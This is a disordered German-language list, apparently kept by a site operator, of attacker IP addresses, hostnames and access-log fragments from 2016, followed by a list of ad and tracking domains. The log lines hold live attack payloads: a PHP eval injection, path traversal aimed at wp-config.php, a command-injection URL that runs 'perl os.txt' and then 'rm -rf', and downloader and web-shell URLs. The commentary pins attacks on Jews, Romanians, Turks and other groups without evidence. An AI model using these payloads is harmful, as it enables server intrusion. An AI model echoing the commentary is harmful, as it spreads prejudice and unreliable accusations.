91.38.143.222 [30/Aug/2016:16:28:17 +0200] ns378267.ip-5-196-68.eu 66.55.148.211.reliableservers.com 182.48.49.205 googel-virus+müll-hoster 8.35.196.176 "Geheimdienst! als "localhost" so so 122.53.158.101.static.pldt.net 122.10.117.19 rootkit java javascript elster finanzamt microsoft xml docx JScript WScript XMLDOM DOM dll package mahorkavodkatvar windows system32 comman control center bundeswehr usb MASHEVHORDA5 OFzynQQQHhO ISvBGaAe 139.6.86.185.in-addr.arpa.routergate.com 123-194-164-147.dynamic.kbronet.com.tw 45.55.39.96 wieder net45 von DIGITALOCEAN, aber auch amazon profitiert von Kriminelle: ec2-52-202-196-74.compute-1.amazonaws.com 122.10.94.89 114.111.166.54 192.187.101.170 114.111.166.54 cliqzbot fuck.the@poneytelecom.eu ctel-185-2-190-38.blizoo.mk 146.148.68.192 fuck.trojaner@googleusercontent.com host31-49-104-201.range31-49.btcentralplus.com 62-210-152-84.rev.poneytelecom.eu 59.94.103.61 02.09.2016 82.208.44.79 .cz seo ppc 196-215-31-149.dynamic.isadsl.co.za 45.251.235.186, 91.227.4.188 = WEBARISI volkan@ni.net.tr Türkei, 120.29.67.205 115.28.71.161 122.10.117.19 111.125.208.32.ssccrm.com 173.208.198.50 198.65.54.169.reverse.slout.ymq80-006.ff.avast.com p3plcpnl0588.prod.phx3.secureserver.net dumme ami-kokser 50.62.176.115, aes-static-210.8.22.125.airtel.in c-67-170-114-41.hsd1.wa.comcast.net ip152.ip-149-56-178.net 149.56.178.152, 178-137-87-242-broadband.kyivstar.net 178.137.87.242, no-dns-yet.unlimited.uk.net 142037.vs.webtropia.com host81-138-20-196.in-addr.btopenworld.com 109.166.213.55 Spammer node-pm.ll-118-174.static.totisp.net 118.174.39.154 200.199.184.169 93.75.187.90 Volia Kirovograd Ukraine 114.97.49.178 aus "Fernost", 178-118-7-139.access.telenet.be [04/Sep/2016:23:38:25 +0200], favd-58-232-154-195.74ervquer.com.br 185.107.26.193 Penetrationstest Penetration Check 117.34.71.36 adsl-dyn162.78-99-130.t-com.sk webgo24-server44.de 37.17.224.44 wbgo gmbh http://www.pedicurehoograven.nl/wp-content/plugins/bot.txt board Hackversuch phpBB shellbot shell backdoor wget LWP www. irc chat s18779237.onlinehome-server.info knackwurst 139.190.250.76 knacker vps17533.inmotionhosting.com 104.152.108.145 heuriger: 196-151-73-109.static.grazkom.at aus Graz und auch noch googlefake 109.73.151.196, wp-ecommerce-shop-styling 202.28.10.20, auch aus Israel: bzq-79-178-85-2.red.bezeqint.net 121.42.154.116 183.160.115.123 insmod.php hack from reverse DNS french access provider see proxad.net, 191.252.62.22 202.28.10.20 search 178.32.203.32 185.68.180.34 cpc101106-sgyl37-2-0-cust52.18-2.cable.virginm.net - - [07/Sep/2016:21:03:01 +0200] "GET /wp-login.php 78.186.31.65.dynamic.ttnet.com.tr sol-fttb.129.127.119.46.sovam.net.ua hoffentlich nicht von: pkk is usa ... mal wieder Terroristen aus den USA: p3nlhg1039.shr.prod.phx3.secureserver.net 50.63.197.130 bb03d5f3.virtua.com.br dummdödel.de@metajob.de . - - [07/Sep/2016:17:12:15 +0200] "GET /budichorg/_pp/ppzens02.txt amd2013.ru 192.95.13.200 139.129.60.64 124.73.6.250 45.63.57.38.vultr.com 5.36.255.134.dynamic-dsl-ip.omantel.net.om ec2-52-202-196-74.compute-1.amazonaws.com 187.40.4.199 jobqueue-listener.jobqueue.netcraft.com-uf6c91a35e31e49fe925fef635034ba7bu-digitalocean 174.120.70.144 p5b0963b3.dip0.t-ipconnect.de 91.9.99.179 mit Virus Firefox 36, 202.28.10.20 kadipaten.idwebhost.com 173.208.177.59 177.84.165.154 = DRAKE-HOLDINGS, no.rdns-yet.ukservers.com Endlich echte Trojanische Pferde aus Griechenland der Neuzeit: aris.hostplus.gr 5.172.194.155 mit neuem "Schadcode" [10/Sep/2016:14:03:50 +0200] "POST 54.159.158.46 ec2-54-159-158-46.compute-1.amazonaws.com Gruß aus dem Osmanischen Reich: 85.105.223.44.static.ttnet.com.tr vh68.hosterby.com 93.125.99.48 Asienmüllbot? 202.28.10.20, 82.223.12.19 arsys.es chile torexit stalker 178.32.127.112 trash.hack@poneytelecom.eu 86-104-178-206.dotrotelecom.ro hm8309.locaweb.com.br 88-248-98-197.spAMGHACK@ttnet.com.tr 158.69.213.58 ovh hosting, na klar. stier-vl22070@dns-privadas.es 212.48.78.136 tomato.mafia@dns-privadas.es 88.150.140.228 = fileserver46s.joomlawired.com bratzen.joomla-php@joomlawired.com uk ltd. puh! 185.37.226.89@freesubspain.es spacken-net@185.68.180.34, russischer dumm-bot/crawler 46.161.9.11 seodedic@gmail.com 12.09.2016 spacken from 94.79.141.26 b2b-94-79-141-26.unitymedia.biz, 31.131.249.214 smtp2.sportsrally.net 185.5.249.84 = Russendisco mit MAROSNET enterprise.ru vpostudio.com - - [10/Sep/2016:15:19:56 +0200] "GET / HTTP/1.1" 403 12098 "http://www.google.com/{${eval(chr(100).chr(105).chr(101).chr(40).chr(39).chr(49).chr(55).chr(73).chr(53).chr(51).chr(48).chr(86).chr(65).chr(117).chr(52).chr(39).chr(41).chr(59))}}" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/20070817 IceWeasel/2.0.0.6-g3{${eval(chr(100).chr(105).chr(101).chr(40).chr(39).chr(49).chr(55).chr(73).chr(53).chr(51).chr(48).chr(86).chr(65).chr(117).chr(52).chr(39).chr(41).chr(59))}}" vpostudio.com - - [10/Sep/2016:15:19:56 +0200] "GET / HTTP/1.1" 403 12098 "http://www.google.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/20070817 IceWeasel/2.0.0.6-g3" srv20.haisoft.net 154.41.66.20 ns3358024.ip-37-187-57.eu yesod.webnetnspire.com 141.8.224.93 Rook Media GmbH Pfaffikon SWITZERLAND rickgrimes.asoshared.com 108.165.20.44 static.6.112.9.5.clients.your-server.de 5.9.112.6 185.68.180.34 52.174.167.114 180.150.227.197 176.31.240.17 .eu //wp-content/force-download.php?file=../wp-config.php drupal c-24-60-91-176.hsd1.ma.comcast.net 165.231.87.199 sparklemotion 31.206.79.208 = Borusan Telekom Istanbul TURKEY ipadm@borusantelekom.net ipadmin@vodafone.net.tr ns3039521.ip-51-255-85.eu alassiohouse.it 95.110.188.127 HinkleyPoint frisch im herbst mit bit-storm geknackt: ip-static-94-242-222-40.server.lu mtn-zm-213-193-039-028.mtnbusiness.co.zm mail.bayport.co.zm 94.242.222.40 aus dem Wok: 116.93.119.229 c156nzay.mwprem.net 153.149.195.77 104.238.102.85 telcloud.cl 202.29.233.27 188.212.33.246 drescher-live.vserver.netz-haut.net 62.146.189.36 info @netzhaut.de server22.bigwetfish.co.uk 5.133.180.199 static.200.31.4.185.clients.irandns.com 185.4.31.200 149.140.106.59 49.213.16.158 85.128.142.101 Nazwa.pl 62.210.152.90 host-37-247-109-21.routergate.com 37-115-190-212-broadband.kyivstar.net 202.29.233.27 broadband.actcorp.in amazonaws.com@poneytelecom.eu poneytelecom.eu@amazonaws.com Zitat: "The following is a list of kiddie hackers with too much time in their hands and too little brains in their heads. These idiots are trying to break into my machine. This is a list of the last few days worth of hacking. See if you recognize any of these addresses and send them an email!": 62-210-152-87.rev.poneytelecom.eu webalizer usage stats webstat 36.73.164.195 wangzhanpaim0909.com 56594067.php 195-154-233-177.rev.poneytelecom.eu infong126.kundenserver.de 212.227.119.14 m1.blake.beget.ru 2e1c32ae.lon.100tb.com web167.extendcp.co.uk p10w2.geo.gq1.hostingprod.com 107.161.24.34 192.99.120.17 favd-58-232-154-195.74ervquer.com.br hm6750.locaweb.com.br 186.202.153.36 184.168.46.97 ns1.siteground216.com 184.154.226.5 ns509972.ip-167-114-101.net 167.114.101.132 69.163.160.208 79.170.40.236 --17.09.2016-- apache2-kant.harlequinduck.dreamhost.com 5-61-27-86.nrp.co 5.61.27.86 web236.extendcp.co.uk
yesod.webnetnspire.com - - [17/Sep/2016:23:42:57 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 141.8.224.93 trojanerbase versüffte computer 62.149.145.51 Aruba S.p.A. Italy hostmaster @staff.aruba.it wh4mail.maxnet.ua Ukraine Krieg Harvester and Rule Breaker 78.158.11.226 broadband.actcorp.in mail.luminad.com static.200.219.209.134.datacenter1.com.br yesod.webnetnspire.com production5.wasabihost.pl 87.98.238.17 Polen abuse@ovh.net biuro@wasabihost.pl admin@wasabihost.pl octane.genirix.com 174.142.187.186 Montreal, Quebec Canada Email info@genirix.com, wangzhanpaim0909.com usermail.lynuxtel.com 125.64.94.206 104.168.146.108 93.ip-137-74-114.eu 118.139.140.1 sh-b1.dca2.superb.net dsl.49.144.53.135.pldt.net 198.27.80.144 lumumba.torservers.net 77.247.181.163 yesod.webnetnspire.com crawl-66-249-64-120.googlebot.com - - [18/Sep/2016:02:45:46 +0200] "GET /?frameRegionalLocation=true 141.8.224.93 165.131.211.130.bc.googleusercontent.com 130.211.131.165 59-115-57-123.dynamic.hinet.net lvps87-230-26-152.dedicated.hosteurope.de 87.230.26.152 tor-exit-4.all.de erst irrer crawler und dann israelische hacker von bzq-109-67-23-125.red.bezeqint.net, pleskcl0272.hospedagemdesites.ws 186.202.183.182 thingebingl0920.com 173.208.177.59 190.90.112.115 178-137-88-86-broadband.kyivstar.net sol-fttb.191.112.118.46.sovam.net.ua thorium flüssigsalz reaktor 78.46.174.55 static.55.174.46.78.clients.your-server.de 120.76.114.201 31.206.116.136 server.leadsfactory.net 171.113.86.214 134-249-116-78-gprs.kyivstar.net 134.249.116.78 customer-200195203196.onda.com.br 87.106.18.198 ns343927.ip-37-59-40.eu Piraten der Karibik 192.187.101.170 download 135.247-94-77.subs.global-e.nl v.g. der fliegende Holländer au den Niederlanden, tor-exit-one.sentries.org 88.198.125.96, 94.177.12.221 Neue Verbrecher-Adressen: load-me-in-a-browser-if-this-tor-node-is-causing-you-grief.riseup.net torsrvs.snydernet.net 5.101.66.180 ip4daadb52.direct-adsl.nl 171.113.86.129 ecbiz156.inmotionhosting.com 198.46.81.12 89-97-163-123.ip18.fastwebnet.it 89.97.163.123 prefhor.cl 190.61.4.74 infogate.org.ua 148.251.77.162 server.medyaekspres.net 217.195.204.34 ip4daadb52.direct-adsl.nl 246.59.148.146.bc.googleusercontent.com ns343927.ip-37-59-40.eu mett metwurst vom Pferd unj.cust.basecom.de 62.146.129.170 146.185.204.196 BelgradeNetwork, ns1.telentic.com 91.142.223.52 www38.totaalholding.nl 31.186.174.198, 91.142.223.52 wh4mail.maxnet.ua indian summer 151.80.40.108 ns397489.ip-151-80-40.eu 42.96.190.11 petahost10.ns.co.th 202.129.206.240 87.98.238.17 wasabi 94.177.12.221 ip-184-168-104-215.ip.secureserver.net 135.247-94-77.subs.global-e.nl - - [21/Sep/2016:06:50:28 +0200], octane.genirix.com 184.107.186.186 174.142.187.186 204.12.255.130 106-222-245-216.static.reverse.lstn.net ip-104-238-102-85.ip.secureserver.net 104.238.102.85 vs2.centre.ru 194.67.34.74 wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php kvark.si 84.255.203.50 [24/Sep/2016:06:52:02 +0200] gesucht werden infizierte ms-windows(windoof-pc server): "GET /public//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php 40.77.69.239 ltx71 spider rus6.localhost 173.208.177.59 88.150.140.228 support@joomlawired.com 84.22.34.7 NTSH_ELEKTRA artmotion.net Kosovo wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets softbank126219175009.bbtec.net 139.129.130.253 customer-200195203196.onda.com.br mirror.armbrust.me 176.31.180.157 ip1f105aac.dynamic.kabel-deutschland.de 31.16.90.172 tor-exit-node.7by7.de 72.52.91.19 tor-exit5-readme.dfri.se 171.25.193.25 184.168.200.220 192.99.62.7 euve249969.serverprofi24.de 62.138.1.92 s17489677.onlinehome-server.info 482.165.26.159 infogate.org.ua 148.251.77.162 yellow-wolf-aaf727ea03161af3.znlc.jp 210.250.248.184
  1. 30.21.43.120.broad.pt.fj.dynamic.163data.com.cn 173.208.198.50 vps1.actualiza.es 149.202.34.151 web.webconnect.ky - - [26/Sep/2016:13:16:43 +0200] s1.justidea.pl 62.210.106.210 Ostblockbanditen 182.239.42.170 netl07.es2u.com ip-63-84.powernet.bg icy.icyberking.com 42.96.190.11 http://shunceng.altervista.org/irc//dos.txt from 178.62.92.154 DigitalOcean London -> http://catalog.obitel-minsk.com/ http://truexlaw.com/wp/wp-admin/injector.txt cpanel0107.hospedagemdesites.ws 186.202.127.240 115.28.17.58 106-222-245-216.static.reverse.lstn.net 192.99.120.17 ns1.found.hosting 37.97.180.68 dtcwin107-dr.dattaweb.com 200.58.115.236
  2. 222.77.213.42 china poneytelecom.eu-FRANKREICH-SAS eurid-whois@bookmtname.com noc+ripe@as12876.net 209.36.45.194 88.150.140.228 Mark Smeed support@joomlawired.com iomart PLC 42.96.140.102 vermutlich jüdische hakker von bzq-84-109-73-13.red.bezeqint.net pleskl0036.hospedagemdesites.ws !! www.bertonshop.com ob das ein italienischer fakeshop ist? 5.135.197.133 (OVH .pl Polen) 192.187.101.170 share.webindia.com 50-24-95-32.bcstcmtk02.res.dyn.suddenlink.net 204.12.255.130 cpro35371.publiccloud.com.br ramba samba schule ;-) globalhost.newentity.it = www.timenet.it 178.250.64.198 178.250.64.60 f.iorio@timenet.it yesod.webnetnspire.com 141.8.224.93 121.42.54.54 98.126.7.108 app:/ServerCheck.swf Krypt Technologies VPLSNET, ns1.telentic.com 91.142.223.52
  3. gw-cluster014.ovh.net ns89148.dotvndns.vn yellow-wolf-aaf727ea03161af3.znlc.jp south-coast-canoes.co.uk uscentral404.accountservergroup.com http://www.federacia.by/xmlrpc/includes/.../os.txt%20;%20perl%20os.txt%20;%20perl%20os.txt%20;%20perl%20os.txt%20;%20perl%20os.txt%20;%20perl%20os.txt%20;%20rm%20-rf%20os.* sgdo1.vpn.mytunneling.com server.planetayurveda.com 192.163.196.239, OVH: ks301110.kimsufi.com 173.208.177.59 abuse@wholesaleinternet.com, 109x194x227x26.dynamic.nn.ertelecom.ru 109.194.227.26 a170786572.example.com 91.200.12.29 95.10.230.97.dynamic.ttnet.com.tr 111.68.97.59.aiou.edu.pk web319.opentransfer.com europe-priva25.privatednsorg.com delta.goforhosting.com srv1.krausskrauss.cl dtcwin107-dr.dattaweb.com 200.58.115.236 168.118.26.117.broad.pt.fj.dynamic.163data.com.cn, www.jugendschutzprogramm.de 83.220.141.202,
  4. DEUTSCHLAND: s17456981.onlinehome-server.info 212.227.102.77 61.160.236.54 Asia Pacific Network, 115.238.251.3 209-164-113-84.static.dal01.corespace.com SPAMMER: 62.210.111.125 IP Pool for Iliad-Entreprises Business Hosting, Paris France 193.201.227.122 telecom@marcoceriello.com 188.47.9.119.ipv4.supernova.orange.pl 85.114.142.176 47.90.44.81 sviluppo.sofiapp.it 51.255.49.115 customer-200195203196.onda.com.br 200.195.203.196 host130-188-110-95.serverdedicati.aruba.it server.leadsfactory.net 87.106.18.198 125.212.35.115 06.10.2016 /zabbix/ 164.115.32.59 srv18.haisoft.net 154.41.66.18 ks301110.kimsufi.com 91.121.73.111 USA: superb.net target: http://shunceng.altervista.org/irc//dos.txt 207.228.240.74 HopOne Internet Corporation 82.139.182.137 MSK BIAMAN Politechnika Bialostocka Poland biaman.pl, fetcher cloud computing s17456981.onlinehome-server.info 212.227.102.77 1&1, routergate.com 95.213.183.148@selectel.ru loft8248.serverloft.com sol-fttb.23.112.119.46.sovam.net.ua, USA+BRD 165.225.72.60: Vorsicht: Müll-Bot-grabber: 165.225.72.71 Zscaler Inc. GmbH Frankfurt am Main Web-Filter Zensur? Cloud-Service mail.4fuckr.com 46.105.96.187 62-209-9-126.wimax.bb.zain.com business sv01.myfv.biz 37.59.29.146 ircbrowse hackagebot c-5eeaaa13-74736162.cust.telenor.se - - [08/Oct/2016:23:29:34 +0200]
  5. 149.140.118.128 88.254.130.226.dynamic.ttnet.com.tr 185.21.40.191 vm0234.enterprisecloud.nu magento-cy.nh-serv.co.uk 185.65.42.17 185-77-43-54.semele.com.tr 185.77.43.54 plesk001-uni.uniweb.be 85.119.185.211 cp9.mkbwebhoster.net Transfer, 47.88.0.90 Alibaba.com LLC, dubioser bot: 165.225.72.60 Zscaler.com Inc. FRA4 Frankfurt Main USA NSA Sandbox ns2.cor.net 120.76.146.29 Tunnel Event Format Security Infrastruktur cloud SAA NAS GRE Protokoll vps-18697.fhnet.fr static.234.203.201.138.clients.your-server.de wangzhanpaim0901.com a170786572.example.com = 91.200.12.29 PP SKS-LUGAN Ukraine @vhoster.net NASA-MNT, 187.79.3.27 158.69.206.202 classic-aloha.com static.6.112.9.5.clients.your-server.de sv01.myfv.biz 82.118.24.216 ip-185-87-116-96.fiber.nl 178.62.92.154 server.lampenmaken.nl server1.mora-hosting.com scanner: 178-175-146-90.static.host -hacker: 103.22.248.24 101.106.85.110.broad.pt.fj.dynamic.163data.com.cn amazon: ec2-52-50-24-46.eu-west-1.compute.amazonaws.com, 207.44.132.76 google fakebot 193.180.166.208 c+1196@resilans.se, kartoffel chips server.leadsfactory.net 87.106.18.198 1&1 Schweden, hostlive.asurejewel.com 149.202.107.127, zur Güte häkker Adressen ;-) aus "Fernost" 112.215.45.91 120.209.196.59 zstm.ru, 78.52.24.138 HANSENET-ADSL, jquery, "WebFuck V2.1 T0PHackTeam www.t0p.xyz": ToPHackTeam-haha-witzig 203.189.235.156 - - [13/Oct/2016:20:35:27 +0200] "GET /admin/fckeditor/t0phackteam/webfuck.shell ... lion.divineonline.me 196.40.106.202 skm111.hostsila.org 195.191.24.196 178.68.180.188, favd-58-232-154-195.74ervquer.com.br neptune.stopspamming.net 216.53.213.126, cpanel.noktadns.net 185.81.237.197
  6. 31.130.206.22 - - [14/Oct/2016:13:12:03 +0200], 37.59.9.137 alpesactu.fr cpanel.noktadns.net xiaotiankehu0606.com thingebingl0920.com 23.97.75.102 5.39.93.95 95.13.149.178.dynamic.ttnet.com.tr smtp2.sportsrally.net 212.227.102.77 vl22070.dns-privadas.es 212.48.78.136 192.187.101.170 China, avxweb3.avx.it 87.106.18.198 ptr214126.vservers.es s17456981.onlinehome-server.info 82.139.182.137 li206-58.members.linode.com 173.255.196.58 smtp2.sportsrally.net 8.5.1.34 45.32.158.128.vultr.com, 81.93.249.90 Franzosen blödbommelhacker support@magic.fr, 186-89-191-183.genericrev.cantv.net classic-aloha.com = http://dp.g.doubleclick.net/apps/domainpark, server.petermurphyelectrical.ie 185.158.248.241 mail.expertmed.eu 86.125.119.134 Expertmed SRL Str. Ioan V. Socec nr. 83 A, Brasov, Romania contact@expertmed.eu sales@petermurphyelectrical.ie 84.22.34.7, 185.158.248.241 allsys, 185.158.248.241 mail.expertmed.eu 86.125.119.134 web-shared.c85.byte.nl 46.21.225.105 120.76.146.29 bb220-255-36-197.singnet.com.sg mb2d111.vdrs.net spammer von 82-135-223-91.static.zebra.lt (kleiderkreisel-cc), 67.211.219.134 serv5.bestseohost.com 144.76.238.206 server18.bigwetfish.co.uk server1.m6.net -- 24.10.2016 -- americium.hostcentral.net 49.50.240.107 167.114.211.10 82.145.60.140 infurio.com 82.145.45.44 hostlive.asurejewel.com 149.202.107.127 72.47.236.169 new-dvex.net 188.93.239.14 server14.temnet.pt keyadviser.net 67.227.26.69 srv.server-phsperu.com lszm.getvm.com 4.ip-51-254-124.eu 180-150-24-110.nbn.traralgon.aussiebb.net ?: 122.193.14.108 221.213.44.5 capri-sonne.de 124.192.134.243 60.219.16.41 ?
  7. 45.34.162.205 host1.hostmama.ro 185.163.108.18 69-195-121-157.unifiedlayer.com useragent user-agent drive9060.station030.com ns28277.ip-91-121-93.eu "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" infong471.lxa.perfora.net vserver76.axc.nl 178-137-87-242-broadband.kyivstar.net lin36.mojsite.com 178.218.165.100 46.211.197.241 vps-16353.vps-ukraine.com.ua 107.170.23.187 keyadviser.net 67.227.26.69 knacki aus Panama.inc@enom.com 149.202.107.127 hostlive.asurejewel.com möglicher Weise ein fake shop fakeshop info@asurejewel.com oder "gehackter" Server oder SPAMmer 46-120-233-143.static.012.net.il 46.120.233.143 mossad oder coffee shop?, team.yobayat.com 93.188.164.195 CYPRUS ++ Mirai ++ server.fishbowlstaging.com 198.1.66.202 netl07.es2u.com 182.239.42.170 Täter: server.leadsfactory.net 87.106.18.198 121.78.195.46 new-vra-uk.org 72.10.32.247 185.60.252.19 mail.delftnet.nl 89.255.24.206 // verdächtig: 191.red.123.91.149.procono.es 149.91.123.191

  8. cookie web-html-bug/pixel-grafik Spitzel Werbemafia: statse.webtrendslive.com instagramstatic-a.akamaihd.net a.twiago.com ad4mat.de cdn.icony.com js.icony.com dmp.theadex.com ups.xplosion.de cdn.emetriq.de dyn.emetriq.de cdnjs.cloudflare.com www.fupa.net fll-ads.com s236.meetrics.net yieldlab.net sportbuzzer.emcdn.net fast.fonts.net count.spiegel.de spiegel.ivwbox.de spiegel.ivwbox.de www1.wdr.de pix.telekom.de imgfarm.com s7.addthis.com addthis.com ch.beck.de dpm.demdex.net segments.adap.tv sync.teads.tv www.entitytag.co.uk dooyoodesite.112.2o7.net visitors.dooyoo.de p.cpx.to cdn.inskinmedia.com static.xx.fbcdn.net count.spiegel.de image.jimcdn.com dmp.adform.net service.maxymiser.net googleadservices.com static.etracker.com adfarm1.adition.com cdn.adspirit.de partner.googleadservices.com widget.whatsbroadcast.com ww251.smartadserver.com www.googletagmanager.com www.trustedshops.com xml.luebben.com y.analytics.yahoo.com zeit.met.vgwort.de zeit01.webtrekk.net script.ioam.de securepubads.g.doubleclick.net browser-statistik.de 4stats.de ad.dyntracker.de ad.yieldlab.net ad2.adfarm1.adition.com adfarm1.adition.com adticket.de agonos.de analytics.twitter.com animate.adobe.com api.mapbox.com assets.pinterest.com aws.amazon.com beacon.krxd.net blog.ivwbox.de c.amazon-adsystem.com cdn.adrtx.net cdn.jsdelivr.net cdn.knightlab.com cdn.stoeerdigitalmedia.de cdnjs.cloudflare.com code.jquery.com connect.ekomi.de count.spiegel.de cse.google.com de.ioam.de dmp.theadex.com dyn.emetriq.de econda.de econda-monitor.de farm.plista.com fls-eu.amazon.de fonts.googleapis.com gmpg.org googleads.g.doubleclick.net google-analytics.com hello.myfonts.net html5shim.googlecode.com js-agent.newrelic.com jsl.bri-img.de lc.iadvize.com s3.amazonaws.com s62.mxcdn.net scontent.cdninstagram.com script.ioam.de securepubads.g.doubleclick.net sg.geodatenzentrum.de snapwidget.com static.addtoany.com static.iadvize.com static.jobleads.de static.plista.com stats.warenform.de tags.mathtag.com track.adform.net tracker.vinsight.de tracking.m6r.eu ups.xplosion.de weblications.guj.de welt.met.vgwort.de vg08.met.vgwort.de cdn.optimizeley.com adaudience.de yieldlab.de emetriq.com secure.adnxs.com ad2.adfarm.adition.com assets.yumpu.com sueddeutsche.de semrush.com www.adcell.de www.video.oms.eu assets.yumpu.com epcpitoba.com www.multicounter.de cdn.iqcontentplatform.de scripts.zeit.de b2b.hyperworx.de werbung.hyperworx.de validclick.com api.hackertarget.com d.254a.com www.payback.de www.stuttgarter-zeitung.de tracking.validclick.com geo.yahoo.com aax-eu.amazon-adsystem.com www.zanox-affiliate.de js.smartredirect.de

  9. aus Germany: unj.cust.basecom.de 62.146.129.170 [27/Oct/2016:19:07:46 +0200], shitstorm shit storm DDoS bba489809.alshamil.net.ae wastelandmhm.magemojo.com 192.190.220.222 187.40.71.59 s1.justidea.pl 62.210.106.210 c156nzay.mwprem.net hosted-by.ihc.ru 37.143.8.13 server2.ipstm.net 199.217.116.47 server.thehovercam.com 192.163.251.11 198.204.238.170 vps.z-tabora.cz 199.193.252.81 server.essentialservices.in 103.48.198.199 srv1.krausskrauss.cl vserver76.axc.nl 159.253.0.105 5.39.93.95 ks3279922.kimsufi.com 5.39.93.95 92.85.227.238 server88.neubox.net 65.99.225.173 200.109.230-177.estatic.cantv.net 200.109.230.177 160.202.163.125 62.205.124.198 Code Injection "AtomBombing" Microsoft Windows AntiVirenprogramm, 183.60.110.21 95.110.188.130 galactica.real-sec.com info@real-sec.com 144.76.40.99 cp9.mkbwebhoster.net 92.48.196.78 thingebingl0920.com 187.40.91.174 ns375706.ip-151-80-18.eu ns311256.ovh.net 91.142.223.52 blade106.mijndomein.nl 91.200.12.12 dumme Zensoren und honeypot-Mißbraucher: hacker@eulenspiegel.name RegistryGate GmbH, serv8.d2ia.com 195.154.68.60

  10. 01.11.2016 SPAM crack Mails mit Microsoft VBC scripting Trojaner besucht: http://remixsarkilar.com/18zfyb7 = 185.126.216.142 JavaScript dll http://susmarket.net/75v2yf6 auf IP 94.138.212.219 "This program cannot be run in DOS mode." http://suziemorris.net/a2enu6 -> 129.121.3.182 psapi.dll snmp urlmon http://gablemero.com/0dsv4i = 67.171.65.64 exe. octet-stream http://wangorce.com/0zsjs35 on IP number 138.201.244.4

  11. hm3070.locaweb.com.br Brasilien Weltmeisterschaft WM 187.45.195.26 pppoe-59-ip164-sv.networx-bg.com Geheimdienst vm9.studio-web.be 158.69.237.99 spammer@OVH.net mail.oao-energiya.ru 31.28.30.17 103.60.172-2.mazedanetworks.net 103.60.172.2, serv8.d2ia.com = 195.154.65.60 = Trojaner poney-telecom .eu, as12876.net ONLINE SAS Frankreich 197.180.151.178.triolan.net Synapse ec2-107-20-220-83.compute-1.amazonaws.com ns311256.ovh.net +33.184130000 ipbcc09465.dynamic.kabel-deutschland.de 188.192.148.101 static-200-69-101-74.static.etb.net.co 62-210-83-88.rev.poneytelecom.eu ns1.e-consultic.com 92.222.23.108, softbank126123116181.bbtec.net 126.123.116.181, GRID 37.187.57.138 178.137.87.242 91.212.203.41 host-91-212-203-41.la.net.ua 1030.2016.com Ransomware 5.39.222.22 contato-59-243-154-195.147serqrema.com.br 199.15.233.176 h-92-247-170-21.nesebar-lan.net customer.sharktech.net 87-207-11-161.dynamic.chello.pl magento-cy.nh-serv.co.uk vserver76.axc.nl panel.joomlahebergement.com 62.75.236.68 host6610.hnt.ru 192.230.92.93 vm02-monty.h4ahosting.com 41.72.154.151 [06/Nov/2016:09:47:38 +0100] 180.107.242.56 mx1.brassknuckless.com thingebingl0920.com 91.200.12.12 SKS-Lugan nsa@alchevsk.net Novohatskiy Sergey Aleksandrovich Ukraine, 104.223.17.50.static.quadranet.com ip4-89-238-229-109.euroweb.ro 89.238.229.109 rumänische Bettler-Banden jpinazo@axarnet.es, 87.76.19.56 bei security@vpsdatacenter.com Future Hosting LLC, infong624.lxa.perfora.net bizcloud22.asoshared.com lsh1005.lsh.siteprotect.com 64.71.32.18 vxadq-06.srv.cat abts-north-dynamic-19.185.180.122.airtelbroadband.in sh-b1.dca2.superb.net 207.228.240.74 mit downloader http://shunceng.altervista.org/irc//dos.txt + http://truexlaw.com/wp/wp-admin/injector.txt www22.aname.net 89.221.250.22 213.251.182.111 gw-cluster011.ovh.net französischer Geheimdienst? ;-) DDR Mauerfall 9. November 1989 (09.08.2016)
  12. ns3358024.ip-37-187-57.eu [09/Nov/2016:15:16:02 +0100] spammer@ovh.com, 47.88.11.165 Alibaba.com LLC China, cpro20582.publiccloud.com.br voyager2.nokytech.fr 37.187.149.100, 198.204.238.170 85.27.167.99.sydfynsnet.dk 67.220.101.84.rev.sfr.net 84.101.220.67 schon wieder franzmann Französinnen müllhacker abuse@gaoland.net SafeBrands domaine@9tel.net, FTP telnet gopher: cpro20582.publiccloud.com.br hühnergrippe vogelgrippe H5N1 Virusmodemcable005.116-202-24.mc.videotron.ca 223.30.31.106 mail.aldel.org osami bin türkei 95.10.204.75.dynamic.ttnet.com.tr oder auch analog vs. dvbt? 183.87.69.2, adcc.pulsedmedia.com sales@pulsedmedia.com 195.154.222.99, srv1.krausskrauss.cl 201.238.235.205, anazir.websterz.us my.skullix.com IIS7 185.100.223.37 cvps9128864660.hostwindsdns.com 104.168.170.31 dedi-fr-35770.tuvixhosting.nl host-213-74-123-233.superonline.net 160.202.163.124 lb-lsp01.atm.binero.net 146.185.223.40 u18017283.onlinehome-server.com 74.208.152.22 wl9-f98.wedos.net 46.28.105.60 151.80.18.236 na klar OVH ns375706.ip-151-80-18.eu, Überwachungsdruck 186-230-38-127.livetim.timbrasil.com.br dubios: nl4-evs1.wc0.pw vorab scanner / Sonde? 222.77.239.52 52.239.77.222.broad.pt.fj.dynamic.163data.com.cn cpro20582.publiccloud.com.br greenhost.bitcoder.org 45.64.96.86 www20.cpt3.host-h.net 184.170.151.20 14.192.208.130 45-22-253-230.lightspeed.iplsin.sbcglobal.net mal wieder ein Chinese 203.232.36.120.broad.xm.fj.dynamic.163data.com.cn ocotillo_infini.acarus.uson.mx prescan mercury.exsilia.net sender14p6.offresduweb.fr Ukraine Krieg dedi-fr-35770.tuvixhosting.nl Stahl broadband.actcorp.in shield, jjjd.us = 66.96.147.106 = dsnextgen.com online gaming BIZLAND Endurance International Group, 52.15.125.185 88.232.90.255 88.99.27.172 static.172.27.99.88.clients.your-server.de 185.129.148.190 llc@itservices.ws Riga dedi-fr-35770.tuvixhosting.nl 31.28.30.17 188.119.150.120 43.224.249.139 mail.agrocomltda.com 190.107.17.66 mail.hcmcsas.com [13/Nov/2016:21:56:25 +0100] h2521975.stratoserver.net 85.214.120.129 server18.bigwetfish.co.uk no-dns.dataflame.co.uk [14/Nov/2016:00:00:19 +0100] comp19.cyberneticos.com 45.32.39.174.vultr.com web235c6.megawebservers.com gw.shared-server.net 142.54.189.162 5-61-27-216.nrp.co hosted-by.donothinghost.info, 